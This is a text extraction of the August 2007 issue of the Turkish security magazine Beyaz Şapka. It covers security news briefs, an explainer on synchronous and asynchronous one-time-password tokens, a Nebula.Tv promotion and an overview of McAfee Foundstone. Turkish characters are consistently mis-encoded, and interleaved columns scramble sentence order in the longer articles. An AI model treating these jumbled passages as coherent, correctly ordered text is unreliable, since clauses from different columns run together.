Agu`07 eskiz-6 - Nebula Bilişim
Transkript
Agu`07 eskiz-6 - Nebula Bilişim
Agu’07 eskiz-6 7/31/07 12:35 AM Page 1 B‹LG‹ GÜVENL‹⁄‹ PLATFORMU KISA KISA KISA KISA KISA KISA KISA KISA KISA KISA • Merakla beklenen 1. Türkiye BSD Konferans› 20-21 Ekim 2007 tarihinde Marmara Üniversitesi Göztepe kampüsünde yap›lacak. Konferansa kat›l›m için doldurulmas› gereken form konferans›n resmi web sitesinde bulunabilir. www.bsdcontr.org • Forefront Client Security, West Coast Laboratuarlar› sertifikasyonundan sonra Virus Bulletin taraf›ndan verilen VB100 ödülünü de ald›. Bu ödülü “in the wild” denilen yani güncel olan virüsleri hatal› alarm üretmeden %100 baflar› ile yakalayan anti-virüs ürünleri alabiliyor. • Google masaüstü sistemler için kendi Linux da¤›t›m›n› ç›kartmaya haz›rlan›yor. Bu çal›flma Microsoft'un masaüstündeki hâkimiyetini sarsacak gibi gözüküyor. Google, Linux projesi üzerinde çal›flt›klar›n› do¤rulad›. Ancak ayr›nt›lar ve projenin gelece¤i hakk›nda bilgi vermedi. • Microsoft, Forefront ailesinin yeni üyesini “Stirling” kod ad›yla tan›tt›. Stirling ile de¤iflik teknolojilerin koordineli bir flekilde merkezi olarak yönetimi ve raporlamas› yap›labilecek. • IronKey flash bellek, “Görevimiz Tehlike” filmindeki gibi kendini fiziksel flekilde (this tape will self-destruct in five seconds) imha etmiyor. Ancak flifrenin 10 kere yanl›fl girilmesi halinde üzerindeki bilgileri siliyor. Üst seviye AES donan›msal flifreleme tekni¤ini kullanan üründe veriye ulaflmak için belirledi¤iniz flifreyi girmeniz gerekiyor. E¤er flifre girerken 10 denemede baflar›s›z olunursa IronKey üzerindeki bütün bilgiler flash-trash sistemiyle siliniyor ve kurtar›lmas› da mümkün olmuyor. • Microsoft'un Vista iflletim sistemini k›rmak için u¤raflan yaz›l›m korsan gruplar›ndan NoPE, “Paradox OEM BIOS Emulation Toolkit” arac› ile amac›na ulaflm›fl gözüküyor. Grubun gelifltirdi¤i bu özel araç Windows Vista’ya lisans anahtar› girmeksizin k›rabiliyor ve tüm güncellemeleri yapmas›na olanak sa¤l›yor. • Pardus 2007 iflletim sisteminin güncellenmifl ara sürümü “Pardus 2007.2 Caracal caracal” yay›nland›. Pardus, kullan›c›lar›na en güncel uygulamalar› ve en son güvenlik yamalar›n› da internet üzerinden GNU GPL Genel Kamu Lisans› ile özgürce sa¤l›yor. • Dinamik web sayfalar› oluflturmada kullan›lan programlama dili PHP sürüm 4 yolun sonuna geliyor. Üç y›l önce PHP 5 sürümünün ç›k›fl›yla bugüne kadar gelinen süreçte yap›lan iyilefltirmeler ve gelifltirmeler PHP 4'ün pabucunu dama att›. PHP 5 flu an için h›zl›, stabil ve üretime haz›r durumda. PHP 6 sürümünün de yolda oldu¤u biliniyor. Bu y›l›n sonunda kadar sürecek PHP 4 deste¤i 31 Aral›k 2007'de sona erecek ve PHP 4.4'ün yeni sürümü ç›kmayacak. Ancak 08-08-2008 tarihine kadar her türlü güvenlik a盤› kapat›lmaya devam edilecek. Programc›lar›n bu süre içerisinde kodlar›n› PHP 5 sürümüne uygun hale getirmeleri tavsiye ediliyor. ANA SPONSORLARIMIZ nebula www.nebulabilisim.com.tr www.microsoft.com.tr KATILIMCI SPONSORLAR ‹LET‹fi‹M SPONSORU INTERNET SPONSORU Beyaz fiapka’ya katk›lar›ndan dolay› tüm sponsorlar›m›za ve yazarlar›m›za teflekkür ederiz. Yay›nlanan yaz›lar›n tüm sorumlulu¤u yazarlar›na aittir. Lütfen her konuda fikrinizi yaz›n. www.beyazsapka.org [email protected] Agu’07 eskiz-6 7/31/07 12:35 AM Page 2 Abonelik Sistemimiz De¤iflti! ‹mtiyaz Sahibi Sinan YILMAZ De¤erli Okurumuz, Sorumlu Müdür Erkan fiEN Hat›rlayaca¤›n›zgibi abonelik sistemimizde köklü bir de¤ifliklik yapt›¤›m›z› duyurmufltuk. Amac›m›z Beyaz fiapka’y› bilgi güvenli¤i ile ilgilenen 3.000 aboneye ulaflt›rmak. De¤ifliklik sürecimiz tamamland›. 28 May›s 2007 tarihi itibar› ile baflvuru formumuzdan "eski abone" seçene¤ini kald›rd›k. Bu tarihten itibaren yap›lacak tüm abonelik baflvurular› yeni abone ifllemine tabi tutulacakt›r. Yeni sistemde abone kayd› bulunmayan okurlar›m›z maalesef Beyaz fiapka’y› temin edemeyecekler. Yay›n Dan›flman› Mehmet Ersin DA⁄LI Yay›n Kurulu Caner DA⁄LI, Erkan fiEN, Seçkin DEM‹R Serkan AKCAN, Sinan YILMAZ Editör Eren ÇINAR, TAMKADRO Grafik Tasar›m ve Uygulama TAMKADRO ‹dari ‹fller Koordinatörü Sinan YILMAZ Bu Say›ya Katk›da Bulunanlar Afflin TAfiKIRAN, Coflkun KAM‹LO⁄LU, Erkan fiEN, Dr. Leyla Keser BERBER, Luc Erol ALPTUNA, Mehmet ÜNER, Murat LOSTAR, Nil ALTINUS, Serkan AKCAN, Sinan YILMAZ, fierif TEKDAL, Umut ‹NETAfi Yönetim Yeri Mecidiyeköy ‹fl Merkezi fiehit Ahmet Sokak No: 4 Kat: 12 D: 121 Mecidiyeköy / ‹stanbul www.beyazsapka.org [email protected] Bask› X-PRESS BASKI A.fi. Tel: (212) 282 52 00 Nato Caddesi No: 17 Seyrantepe / ‹stanbul Ana Sponsorlar nebula 1.Web sitemizden kullan›c› ad› ve flifre ald›n›z m›? Henüz bir kullan›c› ad› ve flifreniz yoksa hemen web sitemizde bulunan formu doldurabilirsiniz. Daha önce bir hesap aç›p flifrenizi unuttuysan›z “fiifremi Unuttum” seçene¤ini kullanabilirsiniz. E¤er kullan›c› ad› ve flifreniz ile web sitemize girifl yapabiliyorsan›z temel kay›t ifllemlerinizi tamamlam›fls›n›z demektir. Kullan›c› ad› ve flifre sorunlar›n›z› yönetim ekibimize iletebilirsiniz. 2.Posta adresinizi kontrol ettiniz mi? Beyaz fiapka, abonelik profilinizde belirtti¤iniz posta adresine otomatik olarak gönderilir. Bilgilerinizin do¤rulu¤unu tekrar kontrol etmenizi öneriyoruz. Profil bilgilerinizi web sitemize girifl yaparak görebilir ve de¤ifltirebilirsiniz. Beyaz fiapka Yönetimi [email protected] ‹çindekiler 04 >> Kimlik Do¤rulama Hiç flüphe yok ki bilgi güvenli¤inde yat›r›m geri dönüflü en h›zl› olan teknolojilerin bafl›nda kimlik do¤rulama ürünleri bulunuyor. Bilgi güvenli¤inin bu önemli oyuncusu hakk›nda bilgilerimizi tazeleyelim. Serkan AKCAN - Nebula Biliflim 18 >> Fazla Güvenlik Göz mü Ç›kar›r? Uzmanlar hakl› olmal›… Luc Erol ALPTUNA – Trend Micro 20 >> Aç›k Kodlu Güvenlik Duvarlar› A¤›n›z› aç›k kodlu güvenlik duvarlar›yla koruyun Afflin TAfiKIRAN – Ford Otosan 06 >> Nebula.Tv Türkiye’nin ‹lk ve Tek Bilgi Güvenli¤i Televizyonu Kat›l›mc› Sponsorlar ‹letiflim Sponsoru Aboneli¤inizi iki ad›mda kolayca do¤rulayabilirsiniz. Internet Sponsoru Tasar›m www.tamkadro.com.tr Sinan YILMAZ – Nebula Biliflim 22 >> Microsoft Network Access Protection (NAP) Microsoft’un güvenlik için en yeni hamlesi Umut ‹NETAfi - Intertech 07 >> McAfee Foundstone ile Risk Yönetimi Sahip oldu¤unuz varl›klar›n risk analizini yap›yor ve yönetebiliyor musunuz? Otomatik ve merkezi risk yönetiminin en kolay yolunu ö¤renin. 24 >> JavaScript Hijacking Uygulaman›z veri aktar›m› için JavaScript kullan›yorsa, bu a盤a dikkat! Coflkun KAM‹LO⁄LU - McAfee fierif TEKDAL – Red Biliflim 10 >> Art›k Kontrol Sizde Microsoft’un Güvenlik Ailesi Forefront ve Yönetim Ailesi System Center ile kurumlar, bilgi teknoloji altyap›lar› üzerinde tam bir kontrole sahip olabilirler. 26 >> Trustmark e-Ticarette tüketici güvenini kazanman›n en kolay yolu Dr. Leyla Keser BERBER – ‹stanbul Bilgi Üniversitesi Mehmet ÜNER - Microsoft Beyaz fiapka, ücretsiz olarak abonelerine da¤›t›l›r. Marka ba¤›ms›zd›r, sayfalar› okuyucular›na aç›kt›r. Bilgiye yöneliktir ve bilgi güvenli¤ine önem veren sponsorlar›n›n katk›s› ile okuyucular›na ulafl›r. Üç ayda bir yay›nlan›r. Nebula Biliflim Sistemleri San. ve Tic. Ltd. fiti. taraf›ndan ücretsiz da¤›t›l›r. 14 >> Sidewinder® Network Gateway Security Firewall’unuz daha fazla güvenlik sa¤layabilir. Sektörünen güçlü firewall üreticisinden daha fazla tehditi nas›l durdurabilece¤inizi ö¤renin. Nil ALTINUS - Aptec 16 >> Underground Web uygulamalar›n›z›n güvenli¤inden flüpheniz mi var? Web güvenli¤ini test eden ücretsiz yaz›l›mlardan haberdar olun. 28 >> Bilgi Güvenli¤i’nin Organizasyonu ve Koordinasyonu Bilgi Güvenli¤i Yönetim Sistemi (BGYS), bilgi güvenli¤ini sürekli k›lmay› ve geliflmeyi hedefler. Bu amaçla hem kurum içinde bilgi güvenli¤ini yönetmek, hem de kurum d›fl›ndaki uzmanlarla yak›n iliflkiler kurmak gerekir. Ama nas›l? Murat LOSTAR - Lostar Bilgi Güvenli¤i Erkan fiEN – Nebula Biliflim A¤ustos 2007 beyazflapka 03 Nebula Bilişim’in katkılarıyla yayımlanmıştır. Agu’07 eskiz-6 7/31/07 12:35 AM Page 3 Serkan AKCAN [email protected] Kimlik Do¤rulama kimlik denetimini meflhur yöntemimizle güçlendirmifl oluruz: Sahip olunan bir fley, bilinen bir fley... a2. Time-Synchronous (Zaman Senkronizasyonu) Bu say›da tek kullan›ml›k flifre üreten teknolojiler hakk›nda bilgi aktaraca¤›m. Birço¤umuz merak ediyor, birço¤umuz kullan›yor ama teknolojisini tan›m›yor. Üstelik baz›lar› ciddi riskler bar›nd›r›yor. Hemen konuya geçelim. Biliyorsunuz bu teknoloji kullan›c›ya verilmifl bir “token” ile çal›fl›yor. Önce token tiplerine bakal›m: de olsa sadece flifre üretmek için kullan›lan bir donan›m tafl›ma zorunluluklar›n›n ortadan kalkmas›d›r. Yaz›l›m token’lar› birçok ortamda çal›flmaktad›r. Microsoft Windows iflletim sistemlerinde, Windows Mobile/Palm avuç içi bilgisayarlarda, Symbian gibi cep telefonu iflletim sistemlerinde, Java taban›yla hemen hemen her marka cep telefonunda yaz›l›m çal›flt›rmak mümkündür. Hatta GSM flebekelerinin k›sa mesaj servisleri ile entegre olup, kullan›lacak flifreyi SMS ile gönderen ürünler bile mevcut. Zaman senkronizasyonu çok daha basit bir algoritmaya sahiptir. Zaman senkronizasyonu tekni¤i ile çal›flan token donan›mlar›n›n büyük ço¤unlu¤unda, flifre ekranda sürekli gösterilir. Bu cihazlar otuz saniye ile bir dakika aras›nda flifreleri de¤ifltirirler. Ancak oldukça önemli bir dezavantajlar› bulunur. fiifre süresi dolmad›¤› sürece flifreler tekrar tekrar kullan›labilir. Örne¤in internet bankac›l›¤›na zaman senkronizasyonu ile çal›flan token cihaz›n› kullanarak girifl yapt›n›z ve a¤ seviyesinde flifreniz çal›nd›. fiifrenin maksimum bir dakikal›k ömrü dolmadan bu flifre tekrar kullan›l›rsa sistem eriflime izin verecektir. okundu¤unda sanki zaman senkronizasyonu çok eski bir teknolojiymifl gibi alg›lan›yor ama birçok token ürünü hala bu sistemi kullan›yor. Hatta birçok banka bu sistemle çal›flan token ürünleri da¤›t›yor. B) Asenkron Eflleflme Asenkron tekni¤i tamam›yla daha farkl›, çok daha güvenilir bir sistemdir. Temelde challenge-response dedi¤imiz mekanizma ile çal›fl›r. Bu sistemde pin kodu olmadan flifre üretmek mümkün de¤ildir. Ancak senkron sistemde oldu¤u gibi pin kodu kullan›c› taraf›ndan belirlenmez. Do¤rulama yapacak sistem her kullan›mda kullan›c›ya de¤iflik bir pin kodu üretir. Kullan›c› bu pin kodunu token cihaz›na girer ve tek kullan›ml›k flifre üretilir. Her do¤rulama iflleminde sistem farkl› bir pin üretti¤i ve bu pin’i token cihaz›na girmemizi bekledi¤i için, bir flifre birden fazla kez kullan›lamaz. Asenkron sistemlerde her kimlik do¤rulama ifllemi s›ras›nda yeni bir pin yaratmak, dinamik trafik flifrelemesine de imkân sa¤lar. Böylece flifrenin çal›nma riski de azalt›lm›fl olur. K›sacas› Asenkron eflleflme sistemi, güvenlik bak›m›ndan senkron sistemlere göre çok daha güçlüdür. Çal›flma ortamlar› baflka olsa da token’lar sabit bir algoritmaya sahiptir ve tüm çal›flma sistemi bu algoritman›n üzerine kuruludur. Temel olarak kullan›lan tekni¤i senkron ve asenkron olarak ikiye ayr›labilir. Donan›m Token Bu büyük güvenlik avantaj›na ra¤men Asenkron tekni¤inin iki önemli dezavantaj› bulunuyor. ‹lki elbette kullan›c›lar›n sistem hakk›nda e¤itimi ve kullan›m zorlu¤u. ‹kincisi ise 3. parti sistemlerle uyumlulu¤u. Asenkron eflleflme sisteminde net standartlar bulunmad›¤›ndan her bir uygulama için yaz›l›m gelifltirmek zorunda kalabilirsiniz. 3. parti sistemler (VPN, Firewall, Radius vb.) genellikle Asenkron eflleflme sistemini desteklemezler. A) Senkron Eflleflme Küçük bir donan›m›n içine gömülmüfl matematik algoritmas› ile flifre üretir. Kulland›¤› tek kullan›ml›k flifre üretme tekni¤ine ba¤l› olarak sadece tek bir tufla sahip olabilir, flifreyi sürekli ekran›nda gösteriyor olabilir veya önceden belirlenmifl bir pin ile flifre üretmek için kullan›lan numerik tufl tak›m›na sahip olabilir. Teknolojisine ba¤l› olarak baz› ürünler kulland›klar› pilin ömrü bitince çal›flmaz hale gelir. Baz› ürünlerde ise pil de¤ifltirmek mümkündür. Özellikle flifreyi devaml› ekranda gösteren modellerin sürekli pil tüketti¤ini unutmamak gerekir. Son zamanlarda programlanabilir token cihazlar› da üretilmeye baflland›. ‹sterseniz siparifl esnas›nda özel olarak programlatabiliyorsunuz, isterseniz numerik tufl tak›m›n› kullanarak token’› bafltan tan›mlayabiliyorsunuz. Bu programlanabilir token cihazlar›n›n en önemli avantaj› flu ki, token sisteminin matematik algoritmas›n› istedi¤iniz gibi de¤ifltirebiliyorsunuz. Yani sistemin kullanaca¤› teknolojiyi seçme özgürlü¤üne art›k sahibiz. Donan›m token’lar›n›n en büyük dezavantaj› kaybedilme/çal›nma riskleridir. Ancak üreticiler baz› önlemler gelifltirerek bu riski s›f›rlayabilir. Yaz›l›m Token Donan›m token cihaz›n›n yapt›¤› iflin ayn›s›n› yapan yaz›l›mlar bulunmaktad›r. Elbette en önemli avantaj›, kullan›c›lar›n küçük Kullan›m› en kolay olan grup senkron (eflzamanl›) token’lard›r. Tekni¤i kendi içinde ikiye ayr›l›r: a1. Event-Synchronous (Olay Senkronizasyonu) Olay senkronizasyonuna sahip token’lar›n dü¤mesine basmak, flifre üretimi için yeterlidir. Sunucu yaz›l›m› üretilen flifreleri belirli say›larda akl›nda tutar. fiifre kullan›ld›¤›nda ise senkronizasyon otomatik olarak yap›lm›fl olur. Bu de¤erli bir bilgidir. Nitekim zaman senkronizasyonu ile çal›flan sistemlerde bazen elle senkronizasyon yapmak zorunda kal›n›r. Olay senkronizasyonu tekni¤inin en büyük avantaj› flifrenin sadece bir defaya mahsus kullan›labilir olmas›d›r. fiifre üretilip kullan›ld›ktan sonra sistem otomatik olarak kullan›lan flifrenin tekrar tekrar kullan›lmas›n› engeller. Özellikle internet bankac›l›¤› gibi kritik sistemlerde ideal bir çözüm olabilir. Nitekim kullan›lan flifre a¤ seviyesinde çal›nsa bile, tekrar kullan›m› asla mümkün de¤ildir. Bu nedenle zaman senkronizasyonuna oranla çok daha güvenilir bir sistemdir. Olay senkronizasyonunda oldu¤u gibi, bu sistemde de sadece kullan›c›n›n bildi¤i bir kodu flifreye eklemek mümkün. Ancak flifreniz çal›n›rsa hem token taraf›ndan üretilmifl flifre, hem de kullan›c›n›n kodu çal›nm›fl oluyor ve bu flifreler maalesef flifrenin ömrü süresince tekrar tekrar kullan›labiliyor. Güvenlik seviyesini art›rmak için, token taraf›ndan üretilen flifreye kullan›c› kendi belirledi¤i sabit bir kodu ekleyebilir. Böylece Bu yaz›y› yazmama neden olan fley, zaman senkronizasyonu kullanan müflteri say›s›n›n flafl›rt›c› derecede fazla olmas›. Yaz› Kimlik Do¤rulama 04 beyazflapka A¤ustos 2007 Özet Tek kullan›ml›k flifre üreten bir sisteme sahip olmak güvende olmak anlam›na gelmez. E¤er bir kimlik do¤rulama sistemine sahipseniz, kulland›¤›n›z teknolojiyi yak›ndan tan›y›p zaaflar›n›z› fark etmeye çal›flmal›s›n›z. Bir kimlik do¤rulama sistemine geçecekseniz, mutlaka güvenlik dan›flman›n›za baflvurun. Bu sayfada tek kullan›ml›k flifre üreten kimlik denetim sistemleri hakk›nda bilgi vermeye çal›flt›m. Ancak çok çeflitli yöntemlerle (biometric, ak›ll› kart, dijital sertifika, vb.) kimlik denetimi yap›labilir. Umar›m bu makale, bir kimlik do¤rulama sistemine sahip olman›n flifre güvenli¤ini %100 sa¤lamayaca¤›n› anlatmama yard›mc› olmufltur. Güvenli günler... Kimlik Do¤rulama A¤ustos 2007 beyazflapka 05 Agu’07 eskiz-6 7/31/07 12:35 AM Page 4 Nebula.Tv Sinan YILMAZ [email protected] Nebula Biliflim olarak Nebula.Tv projesini hayata geçiriyor ve Türk Biliflim sektörünün kullan›m›na sunuyor olmaktan onur duyuyoruz. Ancak her projemizde oldu¤u gibi, Nebula.Tv’nin yol haritas›n› sizlerin geri bildirimleri çizecek. Fikirleriniz bizim için de¤erli, lütfen bizimle paylafl›n. Nebula.Tv içeri¤i sadece bilgi güvenli¤inden oluflan Türkiye’nin ilk ve tek ‹nternet televizyonu. Asl›nda yapt›¤›m›z araflt›rmalarda dünyada bilgi güvenli¤i konusunda yay›n yapan baflka bir televizyon kanal›na rastlayamad›k. “Nebula Yard›m Masas›” ve flu an okumakta oldu¤unuz “Beyaz fiapka” gibi birbirinden önemli projeleri yaratarak, Türk Biliflim sektöründe ilklere imza atan ekibimiz; Nebula.Tv projesi ile sadece Türkiye’de de¤il, dünyada bir ilki gerçeklefltirdi. 2. Kimler Video Yay›nlayabilir? Televizyonumuz Nebula Biliflim markas›yla hizmet verecek ve Nebula Biliflim taraf›ndan yönetilecek. D›flar›dan video yüklenmesi güvenlik gere¤i mümkün olmayacak. Ancak aç›k fikirli politikam›z› internet televizyonumuzda da devam ettirece¤iz. Yani ba¤›ms›z kifli veya kurumlar›n bilgi güvenli¤i çal›flmalar›n› da Nebula.Tv’de yay›nlayaca¤›z. Video yay›nlamak isteyen Beyaz fiapka okurlar› bizimle temasa geçebilirler. Hizmet konusunda her zaman bir ad›m önde olaca¤›m›z› taahhüt ederek bafllad›¤›m›z yolculu¤umuzda, desteklerini esirgemeyerek hizmet kalitemizi art›rmam›za imkân sa¤layan tüm müflterilerimize ve Beyaz fiapka okurlar›na; projelerimize destekleri ile de¤er katan Juniper Türkiye, McAfee Türkiye, Microsoft Türkiye, Red Biliflim, Secure Computing ve TrendMicro Türkiye’ye teflekkürlerimizi sunar›z. 3. Eriflim Nebula.Tv sadece kurumsal müflterilere hizmet vermek üzere tasarland›. ‹çeri¤inde bulunan hack demolar›n›n kötü amaçl› kullan›ma neden olmamas› için sadece kay›tl› kullan›c›lara hizmet veriyoruz. Abone olmaks›z›n video izlemek mümkün olmayacak. 4. ‹letiflim Entegrasyonu Kay›t b›rakarak Nebula.Ty’ye abone olanlar için ‹letiflim Entegrasyonu projemizi de hayata geçiriyoruz. Abonelerimize kay›t s›ras›nda bildirdikleri veriler ›fl›¤›nda düzenli bilgilendirmeler yapaca¤›z. E-bülten entegre bu projemiz, abonelerimizin kullanmakta oldu¤u veya ilgilendi¤i ürünlerin yeni versiyonlar›; yamalar›, güvenlik zaaflar›, rakip ürün karfl›laflt›rmalar› veya kampanyalar› hakk›nda önemli bilgileri iletecek. www.nebulabilisim.tv adresinden sadece kurumsal bilgi güvenli¤i konusunda yay›n yapacak olan ‹nternet televizyonumuzu dört ad›mda k›saca aç›klamaya çal›flaca¤›m. 1. Nebula.Tv ‹çeri¤i Televizyonumuzun içeri¤inin ana bafll›klar›n› belirledik. - Hacking Demolar› - S›n›r Güvenli¤i - Anti-Malware - A¤ Güvenli¤i - Sunucu ve ‹stemci Güvenli¤i - Veri Güvenli¤i - Güvenlik Yönetimi - Di¤er (sektörel seminer ve organizasyonlar) 1 A¤ustos 2007 tarihi itibar› ile Nebula.Tv’ye ücretsiz abone olabilir ve sizler için haz›rlad›¤›m›z videolar› izleyebilirsiniz. Sizlere daha iyi hizmet üretmemiz için lütfen projemiz hakk›ndaki fikirlerinizi bizimle paylafl›n. Hemen flimdi abone olun! www.nebulabilisim.tv Nebula.Tv 06 beyazflapka A¤ustos 2007 McAfee Foundstone ile Risk Yönetimi Coflkun KAM‹LO⁄LU [email protected] Genel hatlar› ile Risk Yönetimi, firma varl›klar›n›n sahip olduklar› risklerin belirlenmesi ve bu risklerin indirgenebilecek en alt seviyede tutulmas› olarak tan›mlanabilir. Sahip olunan risklerin belirlenmesinden sonra firmalar bu riskleri kabul edebilir, baflka bir firmaya aktarabilir veya risklerin en aza indirgenmesi için gerekli çal›flmay› kendisi yapabilir. Risklerin do¤ru tespit edilebilmesi ifl süreklili¤i aç›s›ndan son derece önemlidir. ‹nternet’e aç›k bir web sunucusunun sahip oldu¤u risk de¤eri ile bir yaz›c›n›n sahip olmas› gereken de¤er birbirinden oldukça farkl›d›r. McAfee Foundstone varl›klar›n belirlenmesi ve bu varl›klar›n sahip olabilecekleri güvenlik aç›klar›n›n tespitinde, varl›klara risklerin atanmas› aflamas›nda oldukça kolayl›k sa¤layan güvenlik risk yönetimi ürünüdür. McAfee bu konuda donan›m ve yaz›l›m olarak iki ayr› çözüm sunabilmektedir. Donan›m taraf›nda iki farkl› ürün mevcuttur: • FS1000, iflletim sistemi, veritaban› ve Foundstone Enterprise yaz›l›m›n beraber geldi¤i bu ürün, bir Foundstone sisteminin ana eleman›d›r. Cihaz üzerinde iki adet ethernet arabirimi bulundu¤u için farkl› 2 segmentte tarama yapabilmektedir. • FS850, tarama motoru olarak da adland›r›labilen bu ürün, WAN hatlar› üzerinden tarama yapmak yerine uzak noktalar›n lokal a¤lar›na konumland›r›labilen ve taramalar› lokal olarak yap›p ald›¤› bilgileri FS1000 sistemine gönderebilen üründür. Üzerinde dört adet ethernet arabirimi bulunmaktad›r ve dört farkl› segmentte tarama yapabilmektedir. FS850 kullan›labilmesi için ortamda bir adet FS1000 bulunmas› gerekmektedir. Donan›m çözümü haricinde istenirse, Foundstone sadece yaz›l›m olarak sat›n al›nabilir ve mevcut bir iflletim sistemi ile veritaban› ortam›na entegre edilebilir. Foundstone varl›klar›n belirlenmesinde önemli bir rol oynamaktad›r ve bu varl›klar›n tespitinde birden çok metot kullanabilmektedir. TCP, UDP ve ICMP tarama metotlar›n› kullanarak varl›k tespiti yapabilmektedir. Bunun haricinde bu varl›klar› ePO (Event Policy Orchestrator) veritaban›ndan alabilmektedir. ePO önceki yaz›lar›m›zda detayl› bahsetti¤imiz McAfee yönetim yaz›l›m›d›r. Bu entegrasyon, halihaz›rda varolan bir ePO veritaban›ndan tüm varl›klar›n al›n›p Foundstone veritaban›na kaydedilmesini mümkün k›lmaktad›r. Bu varl›klar istenildi¤i flekilde gruplanabilir ve her bir varl›k için farkl› bir risk de¤eri atanabilir. McAfee Foundstone afla¤›daki birimlerden oluflur: FoundScan: Tarama ifllemlerini yapan bu birim farkl› noktalara kurulabilir. 20 farkl› uzak nokta varsa 20 farkl› Foundscan kurulabilir ve bunlar›n yönetimi tek bir merkezden yap›labilir. Tarama ifllemlerine bafllad›klar› zaman veritaban›ndan ilgili denetim imzalar›n› al›rlar ve tarama ifllemi sonuçlar›n› yine ilgili veritaban›na gönderirler. Foundstone Enterprise Yönetim Arabirimi: Foundstone sisteminde sadece bir adet bulunan bu arabirim tüm tarama ifllemlerinin yarat›lmas› ve yönetilmesi, rapor al›nmas›; otomatik rapor gönderimi, kullan›c› tan›mlamalar›, varl›k yönetimi ve benzeri ifllemlerin yap›labildi¤i web portal›d›r. Foundstone Remediation Modülü: Tarama sonucunda bulunan güvenlik aç›klar›n›n manuel veya otomatik olarak McAfee Foundstone ile Risk Yönetimi A¤ustos 2007 beyazflapka 07 Agu’07 eskiz-6 7/31/07 12:35 AM Page 5 kiflilere atanmas›na olanak tan›r. Örne¤in Unix ile ilgili aç›klar›n X kullan›c›s›na atanmas› veya risk seviyesi high konumunda olan tüm aç›klar›n Y kiflisine atanmas› gibi ifllemler bu modül taraf›ndan yürütülür. Her bir aç›k için farkl› bir ticket ifllemi yap›l›r ve kullan›c›lar web portaline erifltikleri za- Foundstone Update: Sald›r› imza veritaban›n›n otomatik olarak güncellenmesi haricinde FS1000 ve FS850 sistemlerinin iflletim sistemi ve veritaban› ile ilgili güvenlik güncellemeleri de yine bu modül taraf›ndan sa¤lan›r. Oldukça geliflmifl bir raporlama arayüzüne sahip olan Foundstone yaz›l›m›, farkl› formatlarda ve içerikte raporlar üretebilir. Tarama sonunda istenirse farkl› kullan›c›lara bu Her bir tarama sonucunda yap›lan hesaplamalar ile taramaya 0-100 aras›nda bir risk seviyesi verilir, bu bilgi veritaban›nda saklan›r. Y›ll›k veya ayl›k bazda bu say›lar kullan›larak sistemlerin risk seviyesinin durumu k›sa veya uzun dönemli olarak gözlemlenebilir. Threat Correlation Module: Güvenlik aç›klar›n›n hangi varl›k için kritik oldu¤unun tespitinde kullan›lan modüldür. Tüm güvenlik aç›klar› tüm varl›klar için risk teflkil etmeyebilir veya oldukça basit görülebilen güvenlik aç›klar› yüksek bir risk derecesi bar›nd›rabilir. Bu tip durumlarda güvenlik aç›klar›n›n hangi varl›k üzerinde nas›l bir risk teflkil etti¤inin kolayl›kla incelenme-sine olanak tan›r. Sald›r› veritaban›nda flu an itibariyle yaklafl›k 5400 imza bulunmaktad›r. Yöneticiler isterlerse FSL (Foundstone Scripting Language) dilini kullanarak kendi sald›r› imzalar›n› yazabilirler ve bu imzay› Foundstone imza veritaban›na ekleyebilirler. McAfee Foundstone yaz›l›m› McAfee Preventsys ve McAfee Remediation Manager ürünleri ile de entegre edilebilir. Preventsys McAfee risk analiz yaz›l›m›d›r ve Foundstone’dan ald›¤› bilgilerin analizleri neticesinde sistemdeki varl›klar›n, ilgili uygunluk standard›na uyumlulu¤unun raporunu ç›karabilir. Endüstri standard› uyumluluklar› desteklendi¤i gibi firmalar Preventsys kullanarak kendi uygunluk standartlar›n› oluflturabilir ve varl›klar›n buna uyumlulu¤unu da denetleyebilirler. McAfee Remediation Manager yaz›l›m› Foundstone’dan ald›¤› güvenlik aç›klar› raporlar›n› kullanarak ilgili sistemlerin yamalar›n› download edebilir ve bunlar› yönetici onay› ile ilgili sistemlere yükleyebilir. Enhanced Reporting Modüle: Trend raporlar›n›n al›nmas›nda veya spesifik varl›klar için detayl› raporlar ç›kar›lmas› görevlerini üstelenen modüldür. man kendilerine atanan ticket’lar› görebilirler. Foundstone Notification Modülü: Farkl› noktalara kurulabilen bu modül e-posta ve SNMP trap gönderimi ile al›nmas› görevlerini üstlenir. Remediation modülde anlat›lan tüm özellikler farkl› bir ticket sistemine entegre edilmek istenirse, 2 yollu SNMP metotu ile yap›labilir ve halihaz›rda kullan›lan ticket sistemleriyle Foundstone’a entegre edilebilir. Tarama ifllemlerinin bafllamas›, bitmesi gibi durumlar›n kullan›c›lar taraf›ndan haber al›nmas› istenirse e-posta uyar› sistemi kullan›labilir. McAfee Foundstone sistem yöneticilerinin kullanabilece¤i haz›r tarama flablonlar› sunmaktad›r. PCI, FISMA, HIPAA ve ISO 27001 gibi uygunluk denetimleri için özel haz›rlanm›fl flablonlar kullan›labilir veya istenirse farkl› flablonlar oluflturulabilir. Her tarama ifllemi oldukça detayland›r›labilir. Taranacak sistemin ne tip bir iflletim sistemi oldu¤u, sistem üzerinde aç›k bulunan port ve servisler uzak tarama ile denetlenebilir. Microsoft Active Directory yap›s›nda veya Unix Shell ortam›nda gerekli yönetici kullan›c› ad› ve parolas› verildi¤inde, sistemlere uzak eriflim yapabilir ve daha detayl› bir tarama ifllemi gerçeklefltirebilir. Web sunucular›n taranmas› iflleminde source code disclosure, source sifting, web authentication analyse gibi metodlar kullanarak web uygulamalar›n›n güvenlik testlerini yapabilir. Haz›rlanan flablonlar sadece ne tip tarama yap›laca¤› bilgisini de¤il, yap›lan tarama sonucunda ne tip bir rapor haz›rlanaca¤› (HTML, PDF, CSV veya XML), bu raporun kimlere gönderilece¤i, yarat›lan taraman›n hangi zamanlarda hangi sistemler üzerinde yap›laca¤› bilgisini de içerir. Yarat›lan taramalar istenirse varl›k gruplar› üzerinde etkinlefltirilebilir. Birden çok tarama ifllemi ayn› anda bafllat›labilir. McAfee Foundstone ile Risk Yönetimi 08 beyazflapka A¤ustos 2007 ile entegrasyonda kullan›l›r. Intrushield kullan›c›lar› Foundstone’un bu özelli¤inden faydalan›p Foundstone’un tespit etti¤i güvenlik aç›klar›na karfl› herhangi bir atak yap›l›p yap›lmad›¤›n› kolayl›kla gözlemleyebilirler. raporlar› e-posta yolu ile gönderebilir. Ayn› tarama ifllemi birden çok çal›flt›r›ld›¤› zaman fark (Delta) raporlar› al›nabilir. Bu özellik sayesinde sistemler üzerinde yap›lan de¤ifliklik ve iyilefltirme çal›flmalar› sonucunda sistem riski üzerindeki fark görülebilir. Bu raporlar ayn› zamanda bir baflka McAfee ürünü olan Intrushield a¤ tabanl› atak engelleme sistemleri McAfee Foundstone üzerinde birden çok organizasyon bar›nd›rabilir. 